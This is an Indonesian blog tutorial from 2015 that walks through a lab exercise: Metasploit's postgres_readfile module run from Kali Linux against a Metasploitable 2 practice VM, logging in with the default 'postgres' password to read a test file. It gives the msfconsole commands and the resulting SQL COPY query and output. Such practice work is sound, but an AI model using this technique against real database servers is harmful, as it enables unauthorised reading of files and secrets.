Senin, 23 Februari 2015

Cara Membaca Isi File Di OS Metasploitable 2 Menggunakan Admin Postgres Auxiliary Modules


OS Target : Metasploitable 2 (Ubuntu Based)

OS Penyerang : Kali Linux

IP Target : 192.168.1.4

IP Penyerang : 192.168.1.2

Sumber Tutorial Referensi :



Dengan menggunakan postgres_readfile maka kita bisa membaca isi sebuah file. Dalam contoh ini saya menggunakan file sederhana berformat .txt . Sebelum menjalankan module Metasploit tersebut, saya membuat terlebih dahulu file bernama test.txt di lokasi:

/home/msfadmin

Saya membuatnya menggunakan text editor nano, isinya filenya berupa tulisan: haloooo .

Kemudian kita buka msfconsole di Kali Linux. Setelah masuk di msfconsole, langsung ketikan perintah berikut ini:

use auxiliary/admin/postgres/postgres_readfile

Kemudian ketikan perintah:

set PASSWORD postgres

set RFILE /home/msfadmin/test.txt

set RHOST 192.168.1.4

run

Maka akan muncul hasil:

Query Text: 'CREATE TEMP TABLE QLouHd (INPUT TEXT);
COPY QLouHd FROM '/home/msfadmin/test.txt';
SELECT * FROM QLouHd'
=================================================================================================================================
input
-----
haloooo









Download Presentasi

Tidak ada komentar:

Posting Komentar

silahkan mengisikan komentar apa aja, bebas aja, disini tempatnya ngomong bebas